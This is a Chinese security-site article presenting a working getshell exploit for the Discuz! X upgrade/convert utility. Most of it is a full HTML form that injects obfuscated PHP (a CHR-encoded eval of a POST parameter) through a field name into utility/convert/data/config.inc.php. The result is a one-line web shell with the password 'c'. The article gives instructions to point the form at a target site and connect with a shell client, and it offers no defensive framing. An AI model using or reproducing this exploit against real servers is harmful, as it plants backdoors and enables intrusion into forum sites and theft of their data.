热门关键字:   网站安全  系统安全  安全漏洞  黑客攻防  网络安全

Discuz! X 最新Getshell漏洞EXp(自带插件)

发布时间:2013-12-20 19:46文章来源:网络文章作者:秩名 点击次数:
摘要:漏洞路径:utility/convert/data/config.inc.php 在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测! 最后直接修改表单,然后成功! ...

漏洞路径:utility/convert/data/config.inc.php

undefined

 

 

在开始设置里面可以设置数据的属性,而post的数据直接写到了config.inc.php这个文件里面,无任何过滤检测!

undefined

 

 

最后直接修改表单,然后成功!

undefined

 

 

打开EXP直接修改您需要的网站然后直接点击保存即可。

undefined

 

 

  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
  2. <html xmlns="http://www.w3.org/1999/xhtml"> 
  3. <head> 
  4. <title>Discuz! X 系列产品升级转换</title> 
  5. <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> 
  6. <style type="text/css"> 
  7. body,td { font-family: Tahoma; font-size: 12px; line-height: 150%;} 
  8. form {margin: 0px; padding: 0px;} 
  9. a:link,a:visited,a:active { color: #333333; text-decoration: none;} 
  10. a:hover {color: #FF0000;text-decoration: underline;} 
  11.  
  12. .header {background-color: #ffffff; font-weight: bold; text-align: center} 
  13. .input, textarea {font-family: Tahoma;font-size: 12px;color: #333333;background-color: #ffffff;border: 1px solid #666666;padding-left:2px;} 
  14. .top {background-color: #cccccc} 
  15. .bg1 {background-color: #f8f8ff} 
  16. .bg2 {background-color: #fefeff} 
  17. .menu {background-color: #f5f5f5;} 
  18. .tableborder{background-color: #e5e5ff} 
  19.  
  20. .title {background: #5086A5; font-weight: bold;color: #FFFFFF;} 
  21. .title td {background: #5086A5; font-weight: bold;color: #FFFFFF;} 
  22. .title, .title a:link, .title a:visited, .title a:active{color: #FFFFFF; text-decoration: none; font-weight: blod;} 
  23. .title a:hover{color: #00FF00;text-decoration: underline;} 
  24.  
  25. .redbg {background: #FF0000; font-weight: bold; color: #FFFFFF;} 
  26. .redbg td {background: #FF0000; font-weight: bold; color: #FFFFFF;} 
  27.  
  28. * {font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif; line-height: 1.5em; word-break: break-all; } 
  29. body { text-align:center; margin: 0; padding: 0; background: #F5FBFF; } 
  30. ul li { list-style: none; } 
  31. ul {margin: 0;} 
  32. .main{ margin: 40px auto 0; width:770px; text-align:left; border: solid #86B9D6; border-width: 5px 1px 1px; background: #FFF;} 
  33. .content{margin: 0pt auto; width: 95%;  min-height: 500px} 
  34.  
  35. #ulist li {  float: left; margin-right: 5px; width: 30%; overflow: hidden; line-height: 2em; } 
  36.  
  37. h1 { font-size: 18px; margin: 1px 0 0; line-height: 50px; height: 50px; background: #E8F7FC; color: #5086A5; padding-left: 10px; } 
  38. #menu {width: 100%; margin: 10px auto; text-align: center; } 
  39. #menu td { height: 30px; line-height: 30px; color: #999; border-bottom: 3px solid #EEE; } 
  40. .current { font-weight: bold; color: #090 !important; border-bottom-color: #F90 !important; } 
  41. .showtable { width:100%; border: solid; border-color:#86B9D6 #B2C9D3 #B2C9D3; border-width: 1px; margin: 10px auto; background: #F5FCFF; } 
  42. .showtable td { padding: 3px; color: #808080 } 
  43. .showtable strong { color: #5086A5; } 
  44. .datatable { width: 100%; margin: 10px auto 25px; } 
  45. .datatable td { padding: 5px 0; border-bottom: 1px solid #EEE; } 
  46. input { border: 1px solid #B2C9D3; padding: 2px; background: #F5FCFF; } 
  47. .button { margin: 10px auto 20px; width: 100%; } 
  48. .button td { text-align: center; } 
  49. .button input, .button button { border: solid; border-color:#F90; border-width: 1px 1px 3px; padding: 5px 40px; color: #090; background: #FFFAF0; cursor: pointer; } 
  50. #footer { font-size: 10px; line-height: 40px; background: #E8F7FC; text-align: center; height: 38px; overflow: hidden; color: #5086A5; margin-top: 20px; } 
  51.  
  52. textarea, input, select{ padding:2px; border:1px solid; border-color:#666 #ccc #ccc #666; background:#F9F9F9; color:#333; } 
  53. .checkbox { border:0; background:none; } 
  54. </style> 
  55.  
  56. <script type="text/javascript"> 
  57. function redirect(url) { 
  58.     window.location.replace(url); 
  59.  
  60. function checkAll(type, form, value, checkall, changestyle) { 
  61.     var checkallcheckall = checkall ? checkall : 'chkall'; 
  62.     for(var i = 0; i < form.elements.length; i++) { 
  63.         var e = form.elements[i]; 
  64.         if(type == 'option' && e.type == 'radio' && e.value == value && e.disabled != true) { 
  65.             e.checked = true
  66.         } else if(type == 'value' && e.type == 'checkbox' && e.getAttribute('chkvalue') == value) { 
  67.             e.checked = form.elements[checkall].checked; 
  68.         } else if(type == 'prefix' && e.name && e.name != checkall && (!value || (value && e.name.match(value)))) { 
  69.             e.checked = form.elements[checkall].checked; 
  70.             if(changestyle && e.parentNode && e.parentNode.tagName.toLowerCase() == 'li') { 
  71.                 ee.parentNode.className = e.checked ? 'checked' : ''; 
  72.             } 
  73.         } 
  74.     } 
  75. </script> 
  76.  
  77. </head> 
  78. <body style="table-layout:fixed; word-break:break-all; margin-top: 4px;"> 
  79. <div class="main"> 
  80. <h1>Discuz! X 系列产品升级/转换 向导  (<span style="color: #888888; padding: 4px">Discuz! 7.2 --&gt; Discuz! X2.0</span>)</h1> 
  81. <div class="content"> 
  82. <table id="menu"> 
  83.     <tr> 
  84.     <td >1.选择产品转换程序 </td> 
  85.     <td class="current">2.设置服务器信息 </td> 
  86.     <td >3.配置转换过程 </td> 
  87.     <td >4.执行数据转换 </td> 
  88.     <td >5.转换完成 </td> 
  89.     </tr> 
  90. </table> 
  91. <table class="showtable"> 
  92.     <tbody><tr><td class="bg1"><strong>技巧提示</strong></td></tr> 
  93.         <tr><td class="bg2"><ol>如果无法显示设置项目,请删除文件 data/config.inc.php</ol> 
  94.         </td></tr> 
  95.     </tbody> 
  96. </table><form method="post" action="http://www.yunsec.net/convert/data/config.inc.php"> 
  97. <input type="hidden" name="a" value="config"> 
  98. <input type="hidden" name="source" value="d7.2_x2.0"> 
  99. <input type="hidden" name="submit" value="yes"><div class="tableborder" style="margin: auto;"> 
  100.     <table width="100%" border="0" cellpadding="4" cellspacing="1" align="center"> 
  101. <tr class="header title"><td colspan="3">数据源服务器设置 (原始版本的数据库)</td> 
  102. </tr> 
  103. <tr class="bg1"><td width="150">数据库服务器</td><tr class="bg1"><td width="150">数据库服务器</td> 
  104. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbhost]" value="localhost"></td> 
  105. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  106. </tr> 
  107. <td class="bg2"><input type="text" size="40" name="newconfig[aaa 
  108.  
  109. eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" value="localhost"></td> 
  110. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  111. </tr> 
  112. <tr class="bg1"><td width="150">数据库用户名</td> 
  113. <td class="bg2"><input type="text" size="40" name="newconfig[source][dbuser]" value="root"></td> 
  114. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  115. </tr> 
  116. <tr class="bg1"><td width="150">数据库密码</td> 
  117. <td class="bg2"><input type="text" size="40" name="newconfig[source][dbpw]" value=""></td> 
  118. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  119. </tr> 
  120. <tr class="bg1"><td width="150">数据库</td> 
  121. <td class="bg2"><input type="text" size="40" name="newconfig[source][dbname]" value="discuz"></td> 
  122. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  123. </tr> 
  124. <tr class="bg1"><td width="150">数据表前缀</td> 
  125. <td class="bg2"><input type="text" size="40" name="newconfig[source][tablepre]" value="cdb_"></td> 
  126. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  127. </tr> 
  128. <tr class="bg1"><td width="150">数据表字符集 (可选)</td> 
  129. <td class="bg2"><input type="text" size="40" name="newconfig[source][dbcharset]" value=""></td> 
  130. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  131. </tr> 
  132. <tr class="bg1"><td width="150">持久连接</td> 
  133. <td class="bg2"><input type="text" size="40" name="newconfig[source][pconnect]" value="1"></td> 
  134. <td class="bg2"><font color="red">注意:如果源数据库与目标数据库在同一服务器,该项必须设置为0,否则设置为1</font><font color="red"></font></td> 
  135. </tr> 
  136.     </table></div> 
  137. <br><div class="tableborder" style="margin: auto;"> 
  138.     <table width="100%" border="0" cellpadding="4" cellspacing="1" align="center"> 
  139. <tr class="header title"><td colspan="3">目标服务器设置 (已正确安装 Discuz! X 的数据库)</td> 
  140. </tr> 
  141. <tr class="bg2"><td colspan="3"><font color="red">注意:目标数据库的数据将会被替换或者更新,如当中含有重要内容,请先备份</font></td> 
  142. </tr> 
  143. <tr class="bg1"><td width="150">数据库服务器</td> 
  144. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbhost]" value="localhost"></td> 
  145. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  146. </tr> 
  147. <tr class="bg1"><td width="150">数据库用户名</td> 
  148. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbuser]" value="root"></td> 
  149. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  150. </tr> 
  151. <tr class="bg1"><td width="150">数据库密码</td> 
  152. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbpw]" value=""></td> 
  153. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  154. </tr> 
  155. <tr class="bg1"><td width="150">数据库</td> 
  156. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbname]" value="discuzx"></td> 
  157. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  158. </tr> 
  159. <tr class="bg1"><td width="150">数据表前缀</td> 
  160. <td class="bg2"><input type="text" size="40" name="newconfig[target][tablepre]" value="pre_"></td> 
  161. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  162. </tr> 
  163. <tr class="bg1"><td width="150">数据表字符集 (可选)</td> 
  164. <td class="bg2"><input type="text" size="40" name="newconfig[target][dbcharset]" value=""></td> 
  165. <td class="bg2"><font color="red"></font><font color="red"></font></td> 
  166. </tr> 
  167. <tr class="bg1"><td width="150">持久连接</td> 
  168. <td class="bg2"><input type="text" size="40" name="newconfig[target][pconnect]" value="1"></td> 
  169. <td class="bg2"><font color="red">注意:如果源数据库与目标数据库在同一服务器,该项必须设置为0,否则设置为1</font><font color="red"></font></td> 
  170. </tr> 
  171.     </table></div> 
  172. <br><table class="button"> 
  173.     <tr><td><input type="submit" value="保存服务器设置" name="submit"></td></tr> 
  174. </table></form> </div> 
  175.     <div id="footer">&copy; Comsenz Inc. 2001-2010 www.discuz.net</div> 
  176.     </div> 
  177. </body> 
  178. </html> 

 

shell连接utility/convert/data/config.inc.php  密码c

标签分类:

上一篇:WordPress 3.5.1 远程代码执行 EXP
下一篇:Discuz某文库插件任意本地下载